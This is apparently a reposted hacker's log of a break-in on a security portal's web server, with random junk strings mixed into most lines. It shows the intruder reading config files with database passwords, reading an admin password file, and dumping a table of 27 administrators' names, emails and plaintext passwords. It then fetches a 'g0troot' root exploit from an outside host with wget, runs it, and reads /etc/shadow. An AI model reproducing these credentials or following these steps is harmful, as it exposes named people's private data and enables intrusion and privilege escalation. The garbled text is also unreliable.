drwxr-x— 29 astanet apache 4096 Jan 6 13:58 .9 B% c' N0 y: r `; r
drwx–x–x 8 astanet astanet 4096 Dec 23 13:53 ..3 C0 E" B8 O7 L2 c- s
drwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 _0079 u1 b/ s+ U. f8 j) U. s
drwxr-xr-x 7 astanet astanet 4096 Jan 5 2006 _0mysql7 p6 x. I$ j H# Z7 J
drwxr-xr-x 7 astanet astanet 4096 Dec 22 14:16 链接标记astanet@astalavista.com
; [+ m; a& [# T0 o6 V6 U4 {drwxrwxrwx 2 astanet astanet 4096 Jan 5 2006 backend9 i+ u7 i! W0 ?% {! k0 V
drwxr-xr-x 2 astanet astanet 4096 Oct 24 2006 banner
; h: u2 u( h: s) ^0 J0 ^-rw-r–r– 1 astanet astanet 25724 Apr 4 2006 banner.jpg
/ V3 P9 d. V2 G' o0 l7 adrwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 config# W/ {& d: s7 _0 H
drwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 cron
+ f3 {7 S, s2 Ldrwxr-xr-x 11 astanet astanet 4096 Jan 5 2006 dvd0 k3 A# }# y: s. d6 q5 s
-rw-r–r– 1 astanet astanet 36 Jan 5 2006 error.php: r- R& B7 m9 a6 Q% J: ]2 _# k5 O
-rw-r–r– 1 astanet astanet 1406 Jan 5 2006 favicon.ico; O$ j7 T5 p; S" g4 W, G; S1 d
drwxrwxrwx 2 astanet astanet 4096 Dec 15 2006 feed
2 u7 X6 X3 `- t* [' cdrwxr-xr-x 3 astanet astanet 4096 Dec 8 2006 flashtour; B, Z3 i: K1 R9 Q0 p
-rw-r–r– 1 astanet astanet 18 Jan 5 2006 htaccess8 `6 P$ X: D) h- i3 s
-rw-r–r– 1 astanet astanet 585 Mar 24 14:50 .htaccess
/ {7 F; ]. P* D' q7 y-rw-r–r– 1 astanet astanet 398 Jan 5 2006 index1.php9 Q2 m5 a5 _) G# R' ?. z4 X
-rw-r–r– 1 astanet astanet 1036 Jan 5 2006 _index.html
' F" S5 {7 F7 x2 I! h8 ?" U0 n-rw-r–r– 1 astanet astanet 6880 Dec 23 14:44 index.php
* N ]7 }$ H4 u8 n1 {7 X& D. \-rw-r–r– 1 astanet astanet 676 Mar 21 2006 index_redirect.php Q# j9 H4 @5 I! q$ [2 ]3 H
-rw-r–r– 1 astanet astanet 739 Feb 24 2006 index.swf
1 q/ g& e- h+ y7 h" P" kdrwxr-xr-x 4 astanet astanet 4096 Oct 18 2006 irc) c& o- _, c) U' i8 G q- ^. U
drwxr-xr-x 4 astanet astanet 4096 Aug 11 2006 lang5 h2 |, ?' t1 m) n; y2 `* n, E
drwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 lib
) I2 ?' @, }4 c6 E% V# ~( s/ V9 Wdrwxr-xr-x 6 astanet astanet 4096 Aug 11 2006 log. a7 {& Y( q1 s
drwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 member
" @- z! [* Z' y; ]2 S3 qdrwxrwxrwx 5 astanet astanet 4096 Jun 4 00:03 memberdata! J) |$ L3 `: o) j6 ]3 q9 P
drwxr-xr-x 2 astanet astanet 4096 Jan 5 2006 new9 Y6 p8 C; S! x3 ^/ u6 i+ S
-rw-r–r– 1 astanet astanet 7219 Feb 24 2006 pix1.swf
# [/ R1 c5 o3 o$ F% |$ {. k( kdrwxr-xr-x 2 astanet astanet 4096 Oct 27 2006 re
$ F0 e( ~ G4 }" G-rw-r–r– 1 astanet astanet 23 Jan 5 2006 robots.txt5 V' \% |8 H5 z' x
drwxr-xr-x 3 astanet astanet 4096 Aug 11 2006 rss% Y' f% A& B2 e& c3 }" [
drwxr-xr-x 39 astanet astanet 4096 Dec 13 2007 sources
$ G, e( E: h+ }- i% Xdrwxrwxrwx 3 astanet astanet 4096 Feb 2 15:40 temp_com
6 i- Z& s0 }. x$ [/ W( Gdrwxr-xr-x 7 astanet astanet 4096 Aug 11 2006 themes
6 l ^, o: n4 s- [& r$ o% mdrwxr-xr-x 2 astanet astanet 4096 Mar 14 2008 tmp_src
) W) n4 J2 U7 w- M% E/ sdrwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 tpl
6 m3 M4 O9 A" Tdrwxr-xr-x 3 astanet astanet 4096 Sep 7 2006 v2 {7 ~7 {6 L z0 a- j n8 Y& l
drwxr-xr-x 16 astanet astanet 4096 Jul 5 2006 v2_old: k7 ]6 N! g% _/ n# M, [
-rw-r–r– 1 astanet astanet 35 Dec 4 2006 webcash.php* k7 C# [3 _. B( `8 X& {1 m
drwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 wiki
& K- Q- U* k% T8 W4 g4 D0 X) S5 n$ p
sh-3.2$ head -20 index.php9 e' I9 s- R& L
<?PHP
& Q5 {6 g+ f9 | [3 t, O; L/**
3 Y/ e! T( d+ F% p2 r* Mainfile (external) for astalavistaNET v2.0
3 r8 G& ] e3 \/ D*
7 @0 a; y, p+ K9 M% T* X# A* @copyright Astalavista IT Engineering GmbH# ]/ s. C$ o1 j: l( Z/ _
* @author Thomas Kaelin <链接标记thomas.kaelin@astalavista.ch>$ K7 W1 m% D+ b- S# R( E9 w6 ?7 F
* @version 1.0
a# t# K- U% d9 F% m+ J" d5 w*/
2 ^, L: i. l- O D' I
+ F$ e( f- S) Q) x h if ($_SERVER['PHP_SELF'] == ‘/webcash.php’) {! [! O. ^! |0 E5 ]2 _/ I# a x
$dontStartSession = false;
. L' W1 N1 P) Y* t0 v* W4 ~0 X } else {$ N3 e7 L. d5 Z# A; J9 ~6 g
$dontStartSession = true;
7 w! W4 }+ P: D/ s& P/ Q5 u }
v. r3 B8 U+ j) n3 \1 t! d! g require_once($_SERVER['DOCUMENT_ROOT'].’/config/com.conf.php’);
- E. V! E& g0 M9 G1 v) ] require_once($_SERVER['DOCUMENT_ROOT'].’/config/ext.conf.php’);
# d! v" M5 p$ o require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’com.class.php’);
! [( ?# i/ { E5 g( K' v require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’ext.class.php’);& M3 z+ n" T$ Z7 k _. w3 ?0 M7 l V4 s
6 }% N c7 _& ~6 e& Wsh-3.2$ cd config
7 H( H2 m9 C) \4 T. jsh-3.2$ ls -la
$ {0 A5 c+ r+ k7 xtotal 32& a; {: V4 M$ t- f1 s, [
drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 .
1 H: l, M0 Y% @% k& Ldrwxr-x— 29 astanet apache 4096 Jan 6 13:58 .. M/ R/ M" k& d0 @* i( P- R J4 j0 t
-rw-r–r– 1 astanet astanet 987 Aug 11 2006 adm.conf.php: _# ?4 ~9 X8 L# `) u
-rw-r–r– 1 astanet astanet 4937 Dec 23 15:48 com.conf.php
( `$ ~' ?6 [1 b: \, x-rw-r–r– 1 astanet astanet 913 Aug 11 2006 cron.conf.php
4 F% E/ E- O p0 s" _. i-rw-r–r– 1 astanet astanet 1668 Aug 20 2008 ext.conf.php2 p' o( V& J& t
-rw-r–r– 1 astanet astanet 2724 May 30 2007 int.conf.php9 {4 u5 O# w1 E9 I# v" L
2 ^- ?9 p+ `3 v# U4 Wsh-3.2$ cat com.conf.php [8 M/ n! w; t" _
[snip]8 M; ?3 m# |4 D7 d2 `# l! k
//member-database
9 ]: s# |; Q( Q$_CONFIG['db_mem_server'] = ‘localhost’;
" r' i- t7 W0 v/ T! j0 J c/ j/ I$_CONFIG['db_mem_database'] = ‘astanet_membersystem’;
3 h5 k& h- d6 ^# y L$_CONFIG['db_mem_user'] = ‘astanet_db’;7 Y4 l1 z O! R0 V k# u
$_CONFIG['db_mem_password'] = ‘TXwVrC7hbq’;
. X1 n; e' s1 ~$_CONFIG['db_mem_debug'] = false; //true or false
( t8 U" X' @8 R! n1 F; W//ads-database$ E9 q- n, A. q6 f' R7 ]7 B5 B
$_CONFIG['db_ads_server'] = ‘localhost’;
2 R* Z/ N/ F0 e& X8 S/ @8 T3 S$_CONFIG['db_ads_database'] = ‘astanet_ads’;
6 P. U+ e0 K: E" G/ L! S$_CONFIG['db_ads_user'] = ‘astanet_db’;0 }2 t/ k3 o. L* `" Q% X
$_CONFIG['db_ads_password'] = ‘TXwVrC7hbq’;
$ P. g5 K2 z. [( f5 P$_CONFIG['db_ads_debug'] = false; //true or false5 ^5 n) e, Q7 n, J! I
//rainbow-database
1 M$ s9 V- r: E- `* A9 g$_CONFIG['db_rainbow_server'] = ‘212.254.194.163′;
- p7 D: g8 S! E3 L( C2 K. i$_CONFIG['db_rainbow_database'] = ‘rainbow’;
1 @- X. P c+ s9 Z$_CONFIG['db_rainbow_user'] = ‘dinu’;- w t) F/ w& g9 q! p r3 L
$_CONFIG['db_rainbow_password'] = ‘dinudinu’;
9 y" ~0 o4 G5 g6 m& T1 Z6 Z% ?$_CONFIG['db_rainbow_debug'] = false; //true or false
5 A* U9 t" @, H1 v0 G//mailing lists database
% \- J) N% q& J0 ^9 O$ X2 k$_CONFIG['db_mailing_lists_server'] = ‘localhost’;
: d+ a( {$ m* o8 `; K$_CONFIG['db_mailing_lists_database'] = ‘astanet_mailing_lists’;
6 L! ^1 o* v! F+ a* y- {$_CONFIG['db_mailing_lists_user'] = ‘astanet_db’; L( ^. G# m7 \4 G/ y
$_CONFIG['db_mailing_lists_password'] = ‘TXwVrC7hbq’;
8 P& h& o# o* ~% y& i/ t; Z5 [- P$_CONFIG['db_mailing_lists_debug'] = false; //true or false' h2 m6 {, o6 M7 J5 t
//paypal
: w; K7 G, d6 g/ |' W% U$_CONFIG['sub_pp_url'] = ‘链接标记[url]https://www.paypal.com/cgi-bin/webscr[/url]’;5 ?6 I% G! C1 J0 A0 X" }
$_CONFIG['sub_pp_cmd'] = ‘_xclick’;6 t8 D, X* D" S' z7 w, _6 |
$_CONFIG['sub_pp_business'] = ‘链接标记info@astalavista.net’;
$ r2 D) F0 O7 ]! P% [$_CONFIG['sub_pp_noship'] = ‘1′;
% p. }: `( {' Z+ h8 F4 z$_CONFIG['sub_pp_referer'] = ‘链接标记[url]https://www.paypal.com/[/url]’;
; ?. u" ]1 V$ U5 F[snip]
8 `9 U( `0 H) u- Y3 \
+ o4 R* ^, H6 w6 f. dsh-3.2$ cd .." m2 x4 m& V8 T4 j1 X
sh-3.2$ cd member
/ a/ N, ]$ B/ E/ `: O( y- osh-3.2$ ls -la {6 ~. v# x% n% c
total 20
1 Q" Z& S: c1 j" b. S' n- Edrwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 .2 y7 o: x/ a+ `8 G$ z- R: {
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..7 p( Z7 o& O3 J- M" _
-rw-r–r– 1 astanet astanet 19 Jan 13 14:02 .htaccess: W9 V1 M1 o: j; x
-rwxr-xr-x 1 astanet astanet 6709 Jan 13 14:06 index.php: }. p2 H* \1 [9 H# W
sh-3.2$ cat .htaccess, g. z/ n* K7 W
SecFilterEngine off9 D0 |; G2 C: m- v
, X# b& T6 j5 c+ ?8 x4 Z0 c$ ?sh-3.2$ cd ..' S$ }7 _6 N0 ?) r' P8 O& i; {6 s
sh-3.2$ cd cron
8 d! _1 f) k N! o+ x! P8 S" Lsh-3.2$ ls -la( X5 ], T: ^* H$ c N: C4 {
total 168
. @; ]' y7 I8 k3 X1 }: `6 Q; f! s# fdrwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 .6 R6 k' @+ I% D. ~
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..; a4 ?2 W3 g5 g
-rw-r–r– 1 astanet astanet 1272 Jan 12 08:24 0_corefile.php- ~$ g5 q# g4 u" l
-rw-r–r– 1 astanet astanet 2356 Aug 11 2006 0_functions.php
! i2 F# m; \2 N/ Z8 t-rw-r–r– 1 astanet astanet 3616 Dec 23 15:44 1_daily.php! }7 E" z+ t6 ]. j, n
-rw-r–r– 1 astanet astanet 527 Aug 11 2006 1_fivemin.php
! P* ?' H$ n* r' M7 B7 T-rw-r–r– 1 astanet astanet 5006 Dec 23 15:39 1_hourly.php
! h' D$ Z) d# ?8 I" ]-rw-r–r– 1 astanet astanet 432 Aug 11 2006 1_weekly.php
( Z8 B! F; Y R0 R% |% u-rw-r–r– 1 astanet astanet 2277 Aug 11 2006 2_advertising.php
1 P% i4 E, }$ n t) u+ N6 z3 a-rw-r–r– 1 astanet astanet 4882 Dec 23 15:40 2_archives.php+ D* }$ a( ^7 d. q; r5 V {1 _) j
-rw-r–r– 1 astanet astanet 3784 Aug 16 2006 2_awstats.sh/ ?2 E% W, E' s7 V; d9 K! \' b. H
-rw-r–r– 1 astanet astanet 14894 Jan 12 08:51 2_expire.bak.php
0 v. U& H, l) _; U+ L* ~5 X+ C-rw-r–r– 1 astanet astanet 14979 Jan 12 09:10 2_expire.php" L C7 L9 a5 h6 ]# q0 p# g
-rw-r–r– 1 astanet astanet 7657 Aug 15 2006 2_exploitree_updater.php ?7 ]! r. t8 ^& B
-rw-r–r– 1 astanet astanet 686 Dec 23 16:31 2_filesize.sh
0 i; P" _% ]) Q& | w' M-rw-r–r– 1 astanet astanet 9853 Aug 11 2006 2_keywords_old.php
, n: J, l( |, k2 E-rw-r–r– 1 astanet astanet 15664 Sep 22 2006 2_keywords.php' S6 W. ]5 S. K3 m1 b
-rw-r–r– 1 astanet astanet 1233 Aug 11 2006 2_proxy_checker.php* n, y2 R+ j5 Q- i$ x
-rw-r–r– 1 astanet astanet 7558 Aug 11 2006 2_proxy_collector.php4 F$ V0 o$ A. F8 y2 g
-rw-r–r– 1 astanet astanet 796 Aug 11 2006 99_create_emails.php. o [/ v2 U; j8 q
drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 99_lang_email
3 X$ H5 T4 `/ L+ N. H0 t-rw-r–r– 1 astanet astanet 9622 Jan 6 16:04 login_reminder.php! w7 {7 r3 _. q U! K
-rw-r–r– 1 astanet astanet 9620 Jan 6 16:05 login_reminder_test.php$ ] ?# N3 @7 G) T* g# j
, `$ C9 c& S5 G& {& H) Z+ h. S! y8 O
sh-3.2$ cd ..
. n6 [* ^6 J- M* ssh-3.2$ cd _0076 T3 W9 `0 n6 D& r
sh-3.2$ ls -la) T N. \; q$ R% ]0 H" G) M; Z
total 24
{! v0 `$ ^' b: M8 ^) k3 |! R' bdrwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 .! ?4 e V6 F" Q% A, g) l
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..- q' S5 [- K0 ?( M2 a4 r
-rw-r–r– 1 astanet astanet 96 Dec 23 15:17 .htaccess
& \( c& Z( ]( B-rw-r–r– 1 astanet astanet 3263 Jan 15 2007 index.php
: f( g# {! K, b: M: o" b8 L-rw-r–r– 1 astanet astanet 20 Dec 27 2006 info.php
; {- J' d% ~: B, w1 F& Ldrwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 sitemap8 }, ~0 o# }" N9 j) Z4 ?) L2 w
2 q; F) |4 Z osh-3.2$ cat .htaccess
7 b) U7 i L) m& c% v6 b/ t, s) BauthType Basic
4 D" P+ s+ i: k3 @2 s/ S1 lauthName Admin
& N# p* o, E$ C( i4 a8 nauthUserFile /home/astanet/auth/.htadm_pwd
}1 `7 e( Y5 q' [% vrequire valid-user
1 Z1 {) J+ A1 f* W" C4 U! e2 E2 Z7 G% _( h B) U6 b6 v( g# z8 J
sh-3.2$ cat /home/astanet/auth/.htadm_pwd
, M4 V* ?6 [5 k) e/ n& @admin2net:CR0bl65MwhfT$ k/ B' N, `6 T6 a
6 _# L/ b/ ?1 T8 j( x, t- ]# J( ^sh-3.2$ mysql -u astanet_db -p
4 ^2 `2 g# z' |5 m- rEnter password:& K9 t; B: @) D& U8 s
Welcome to the MySQL monitor. Commands end with ; or \g.
$ z( T. T4 z4 o$ ]1 O9 @- a8 B8 \Your MySQL connection id is 2751535 d; y i0 G1 }# X# }/ e
Server version: 5.0.45-community-log MySQL Community Edition (GPL): A- y3 y+ `+ t8 H8 @5 T
, ^( D+ C+ M/ w8 G0 B
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
0 g6 t g# U9 @: S
3 |/ [: W |% s! ]3 Omysql> show databases;
4 ?" e8 Q9 u4 R# Z! ?% u/ A% R+———————–+3 Z0 K0 u0 G; n
| Database |( v$ f' b0 Q4 C% _0 L
+———————–+( I7 h0 A7 ?+ w3 r2 N" C: I$ Q
| information_schema |' z( Q/ f g, W6 _0 R
| astanet_ads |* ?; A# c' }. g+ ^: H. e
| astanet_mailing_lists |$ f) j X' p" [' g, z
| astanet_mediawiki |9 h- M5 P) j4 N! @
| astanet_membersystem |5 P) n; R2 G7 ^" \" g- l
| test |
/ t: e1 f3 M7 \' F6 [# S* o" v+———————–+" I( R- U( _' `& o* W! y/ d% P$ j: M9 s
6 rows in set (0.00 sec)% p2 y' J1 P8 a
" A7 T6 k4 o+ ^( t4 Ymysql> use astanet_membersystem
- o* E0 p! ~6 h/ ]0 \6 b/ p9 [4 wDatabase changed- C2 I% v# H, @9 f* O6 \
mysql> show tables;6 I8 [+ `3 L; c1 }6 s) N7 j
+———————————–+* ]4 @ O9 H" ~, i$ M: u
| Tables_in_astanet_membersystem |5 J* v3 K$ H3 n8 D* s
+———————————–+. k9 i" H" m/ u
| blacklist_categories |
- o1 L6 c1 L$ [& _2 R$ \$ J4 S) _| blacklist_content |' U# U5 \6 u8 w
| blacklist_levels |3 j9 s ]: G8 [
| blacklist_mcset |
/ |; |6 K8 A+ Z) L| dir_categories |
9 s" g" ]$ _/ @. \; a9 [$ W9 a/ E1 S| dir_comments |4 _6 m5 Q2 K% B6 ^0 P
| dir_links |
2 ?4 \$ Z& j/ }( o% V| dir_temp |
& n S! G, U2 ^ u, S4 n| dir_votes |+ s( J1 Q/ J' z) e) ]) b7 o7 v
| documents |
) M/ F) U' X4 ^" x& X| documents_categories |
; w- V3 P# z. J* d; t( p7 N3 P' m| email_content |
) v1 b0 T! B3 K5 [| email_settings |
' G/ `6 \4 y! z' W| exploits |
' W9 G, d! O& O! P0 F( A( V| exploits_categories |
% \! z' g# q: x" e9 i- H- _| exploittree_categories |
( T, S, `9 T) z| exploittree_exploits |1 B; p3 h Y3 ^) d+ s
| home_values |. n' o& h; \7 `3 s" k+ u
| iso_countries |
8 G1 c( n6 h/ l% P' {( l| links_categories |
+ A9 C, `9 K; ^3 t9 j* m| links_records |
6 f* D% L3 M' d6 y# e4 Q1 @8 U7 `| links_unauth |6 P/ i+ h* {; T$ @: T( P
| links_votes |
% a1 t& ]! t$ k* D2 b( {| log |! P# I! o4 s& g4 {5 B) v, i* _
| news_categories |: h/ {6 y5 T; U8 p' e. r% i, A- i( y
| news_comments |2 ~7 |. W% b _: V5 _
| news_emoticons | Y% o5 m4 D! ?5 F
| news_latest |) Y5 n0 M1 w' j
| news_messages |+ y y. a7 Z1 I: T6 U9 h+ p" u
| news_statistics |
9 M# f6 A, J z2 K* n5 _# D r) x| news_votes |* l7 P" F' n. X: [( k! S$ l( V
| prices_content |9 D6 t. `9 i, a" I( v* C! k/ c, g' @
| prices_offers |
! u! V0 p, u; }' ^( K0 F| rss_settings |7 {. p0 _1 M5 D
| sessions |$ N1 T0 _* ~/ ]3 w
| stats_signups |
& t8 ~% ~; ~/ y| u2u2 | t; @. _9 j9 X b) `
| u2u_contact |
2 w6 ~7 K3 Y6 L2 |5 l- m| u2u_settings |
! B3 {1 q d7 ?! F/ H| user_keywords_selected_categories |
1 s. c8 H6 O: T0 E- ?% D5 i| users |/ c2 S! A! f/ _) |# k- t) K
| users_ipn_test |
1 K% m0 L% X" U6 H: v* @" V% I| users_keyword_values |
2 `0 d' \6 c/ H! n- x: q| users_profile |
1 O* v. \2 Y) N. c1 d| users_temp |
, g3 O8 r9 S1 z* C' `' x% h| users_upgrade |
; u/ @3 }1 u/ H6 M+———————————–+
4 E l7 v s* P' J) e$ H: u* h46 rows in set (0.00 sec)
2 M/ D, V/ j6 I6 ^% [4 G
$ ~/ z* ?! ]' s7 V7 j5 A bmysql> describe users;
! W4 E _ F9 Y( S4 n2 a+————————–+————————————–+——+—–+———————+—————-+
$ e3 z( J; u" {5 c' B( C. S, l| Field | Type | Null | Key | Default | Extra |% o, y$ b) p& K8 j. @4 g& L
+————————–+————————————–+——+—–+———————+—————-+( `0 P+ Q# H9 ?( d8 u
| primary_key | smallint(5) unsigned | NO | PRI | NULL | auto_increment |
' h- A* ~6 Q8 ^| user | varchar(50) | NO | | | |' c4 a' t# [( m) b
| nickname | varchar(30) | NO | MUL | anonymous | |+ ^2 F) X( O, U+ w
| password | varchar(30) | NO | | | |8 n( _+ ~# H- s# B6 |, M
| userlevel | tinyint(3) | YES | MUL | NULL | |; C5 l+ w# O: g. Z
| exp | int(8) unsigned | NO | | 0 | |
. |8 W& u! ^ P$ `3 C! e5 _. {| email | varchar(50) | NO | | | |
8 H( }- k1 [: K| ip | varchar(15) | NO | | 0 | |2 R: r( ]4 I( d( D/ ], X+ C5 V
| proxy | set(’0′,’1′) | NO | | 0 | |1 u( X$ M! g9 _/ _
| logtime | timestamp | NO | | CURRENT_TIMESTAMP | |# }$ o0 r' O. b1 A4 e4 E
| login_reminder_last_sent | timestamp | NO | | 0000-00-00 00:00:00 | |8 B" q( d) E* K- F/ o. X+ k5 f/ `
| anz_in | tinyint(1) | NO | | -1 | |: `6 Y! l/ B2 {% A/ v
| status | tinyint(1) unsigned | NO | | 0 | |$ g9 T6 H6 @$ [/ I# Q0 g
| checked | set(’0′,’1′,’2′) | NO | | 0 | |
% r' f, U+ K. j4 m3 }| freemember | set(’0′,’1′) | NO | | 0 | |
1 _$ o0 n5 P( R# k- M| ordertype | set(’transfer’,'wp’,'pp’,'mc’,'CnB’) | YES | | NULL | |" S) M p- \2 X$ [2 D+ t1 n
| lang | tinytext | NO | | | |
% ]" H# y, j1 l| adid | smallint(6) | NO | | 0 | |
5 F9 l9 [ D, A2 G3 m| pp_txn_id | varchar(255) | YES | | NULL | |
1 M/ O) Y# M4 T- h| cnb_transaction_id | varchar(255) | YES | | NULL | |
1 R- |" H. @8 H1 n' X| cnb_order_id | varchar(255) | YES | | NULL | |
7 v9 L" M( E, S) f| cnb_user_id | int(11) | YES | | 0 | |2 Y2 `/ A' f3 O! B4 @# k3 x
+————————–+————————————–+——+—–+———————+—————-+, x: x6 }: v% ?! b( s" b, ^) z
22 rows in set (0.01 sec)& N0 z( ^/ S6 w e; f7 O Z: n1 S# ^
7 t3 S# O* s, bmysql> select count(*) as skids from users;
6 ]) N5 L, Q1 K* ^6 U+——-+
9 u! ?. b0 w7 m0 A4 J| skids |
. T* x* L" ~6 G/ V3 U+ |# x+——-+4 B7 @8 ^: K3 ?& P; I
| 25199 |! I+ P8 f0 A( }+ h9 q# J
+——-+
& M, X# T9 I% L8 t/ L* z1 row in set (0.00 sec)
: w4 Q- f7 d, L; i; S# l; e
& b( S; U: Q: X# l/ G( mmysql> select user,nickname,password,email from users where userlevel = 1;. B d0 k6 V* [: }6 `# g4 P- c
+————————–+———————-+——————+———————————–+' ]( x3 B5 K/ G$ t# d) H5 M
| user | nickname | password | email |
1 \$ i- X5 L* B7 Y t5 O+————————–+———————-+——————+———————————–+
5 w1 _6 W7 ^5 g& [$ P| pascal | prozac | astaman3 | 链接标记info@astalavista.net |
( m+ W: w+ j/ s| Ivan Schmid | rOOtless1 | astalavista4asta | 链接标记ivan.schmid@comvation.com |
% C( _* _- u1 Z% ~# c6 J6 k$ A| qreymer | Palermo | qblsw85iam | 链接标记eche@home.se |* A7 f9 _5 c0 a+ O# i9 V
| Christian Wehrli | g0atherd | hitt?74 | 链接标记g0atherd@gmx.net |
+ q1 y3 o9 i# L. y3 Q8 a| Andrew Blake | Minky | liq73uid | 链接标记a.blake@har.mrc.ac.uk |+ V1 Z& H' e% {, |3 k
| Martin Wyss | dinu | kj63;cXy | 链接标记martin.wyss@astalavista.net |+ i, u+ P; n k% H L. T
| Leandro Nery | Timan_no_Sanco | nery2002 | 链接标记leandronery@hotmail.com |
! q: T0 f2 T: T5 |' a3 O| shaving ryans privates | ShavingRyansPrivates | memberboard313 | 链接标记shavingryansprivates1@hotmail.com |4 A& F( w/ S& @/ ` z/ w$ |7 P* [: E
| Gerben van der Lubbe | Spoofed Existence | Lb59eXg5 | 链接标记spoofedexistence@hotmail.com |
- L* [ S8 s5 g% H2 Z| David M Lee | Daremo | icG12m03 | 链接标记daremo@hackerheaven.com |
" Z( }; F- r2 U( e| David Corn | akriel | ve3uB$cUku | 链接标记akriel@fallenroot.net |
# [5 L9 B: O3 x( s! Z4 H0 `9 e7 || Thomas Kalin | Gwanun | QwErTy123 | 链接标记thomas.kaelin@astalavista.net |& |5 S# E, ~$ r+ y( [, }4 a7 S
| Marcus unknown | Cra58cker | hhCr4ck06 | 链接标记unknownmarcus@hotmail.com |
" a) q O# H; S% c4 d$ Q. o| David Ellis | dellis203 | philip | 链接标记dellis@nightwatchnss.com |7 @# k# H( O& q0 j ]5 V5 c
| Lars Christian Solberg | xeor | tF3s4|Nea | 链接标记xeor@hush.com |
, F0 T9 R2 V9 P) a1 L| Paulo Santos | Be1er0ph0r1 | amor01 | 链接标记pmsantos@gmx.ch |+ S: i+ d1 k' A2 ]% K, ]
| Thomas D?ppen | daha | asta4tom | 链接标记thomas.daeppen@astalavista.ch |% H' h$ C) a2 B! w
| Touraj Abbasi Moghaddasi | -Crow1 | NetR0ck | 链接标记toraj.a.m@gmail.com |& U1 F& B1 u% b6 _
| Fabius Bernet | traviser | wellenreiter100 | 链接标记fabius.bernet@astalavista.ch |( {* V! A! f3 O ] a3 k o/ ?
| Zachary McElroy | duder1 | dirty245dix | 链接标记mcelroyzj@yahoo.com |& ~$ _( Y8 {5 d) s: r0 q
| Leron Cohen | cohen2 | leron4free | 链接标记leron@quiredmedia.com |
; p8 t! n: l6 }| Beatriz Pontes | anonymous1656 | pitas | 链接标记joao.pedro.pontes@gmail.com |8 W% k' u8 I6 ^' F! ]
| Glafkos Charalambous | anonymous2086 | si99490178$# | 链接标记nowayout@webhostline.com |
# J, g8 l4 n. ~: v| developer COMVATION | anonymous2402 | Ri?Q$Q$MVU | 链接标记ivan.schmid@astalavista.ch |
- D- Q/ W5 V* ~9 }# q2 N| Peter Fisher | cyph3r1 | testZer025435 | 链接标记cyph3r@astalavista.com |
( Y; y5 o- ?2 ^/ ~# K, G% P| sykadul | sykadul | ak29eral | 链接标记sykadul@gmail.com |
4 u1 c5 w" \" ^0 n| Ronny Janzi | commander1 | mpbdaagf6m | 链接标记ronny.janzi@astalavista.ch |1 P* U2 X* Y+ |9 X1 B& O
+————————–+———————-+——————+———————————–+
' ]" u1 {/ \- C. x, G27 rows in set (0.00 sec); l0 y0 i- [1 G1 I& }0 J' I
I8 B% \$ r7 O. l* e" Y9 zmysql> exit;
* a) g. }# E" G( J. JBye+ v E: d& U" O) t
- r% }) D& j: A2 K8 j( [1 s
[~] plaintext passwords? yes,/ d, `: o9 p% j( `. Q. n
Those so called “security professionals” who charge you $6.66 / month to
+ \1 S( \0 P Wregister at their hack-proof portal, save your passwords in plaintext…% { E! o( h: U& Q3 Q2 i
brilliant!
$ B* c D& l" X) _9 I. k- V2 n/ a$ ~; m
[~] This been fun but we want more.7 A, ^& \& `4 ]: r, f0 P' `
" H( V0 L! o2 {6 u
sh-3.2$ uname -a
+ Q0 t4 q, d5 ?: dLinux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux K2 O+ J# Q1 e" J
sh-3.2$ wget 链接标记[url]http://anti.sec.labs/g0troot[/url]8 ~. @ [$ R' u' p! g$ |' K2 B
–13:33:37– 链接标记[url]http://anti.sec.labs/g0troot[/url]
' o( j/ u# C2 ?0 _+ d, l6 O. F4 TResolving anti.sec.labs… 13.33.33.37
$ w m" U2 y6 r5 q' MConnecting to anti.sec.labs|13.33.33.37|:80… connected.0 g: R f* ?: l- W9 g: R
HTTP request sent, awaiting response… 200 OK: ~1 L1 a U; N1 b
Length: 18200 (18K) [text/plain]
4 g9 O, u2 K+ h% E: T& oSaving to: `g0troot’
6 r; f' W" A8 H7 Z! h
# \8 A6 V5 Y* @! r! r5 \3 K100%[=========================================================================================================================================>] 18,200 58.6K/s in- r; m9 O1 j8 y2 a' ^* N. z5 ?
0.3s0 E0 |+ [: _ C0 n l; x. o( w$ j
3 y/ v% Q/ |! R8 I0 Q3 c, ?
18:55:14 (58.6 KB/s) - `g0troot’ saved [18200/18200]
% X8 H% h8 w p- t7 p
8 [5 B8 v& Q; A2 T: N9 ~: Wsh-3.2$ ./g0troot -i x86_64, H& H6 b3 A/ v# F4 w, u
[+] g0troot - anti.sec.labs
' M8 B- X6 I3 x9 _4 o2 C- B& i[+] Target: 2.6.18-128.1.10.el51 O" Z7 ~7 M) e
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]
+ K5 J( f) t; k R6 t3 R* ?1 h1 x+ W2 `- v
[+] r00tr00t
1 p6 W$ C1 R8 S[~] Executing shell…2 ^/ j. i: _% i
% _) u0 [1 X4 R3 C$ H
sh-3.2# id
# u- ] g' F( ]& ^! @- C& _1 A/ iuid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)4 x, f1 L5 u8 x3 h' R
! |# i3 I& x4 h: m( J' K
sh-3.2# cat /etc/shadow
. @3 z1 ^5 y8 L2 J, Qroot 1$P/3ZMAgv$E9B4mX02s1Xrimj46V602.:14015:0:99999:7:::
O. C9 y2 Y, Q' W! |[snip]
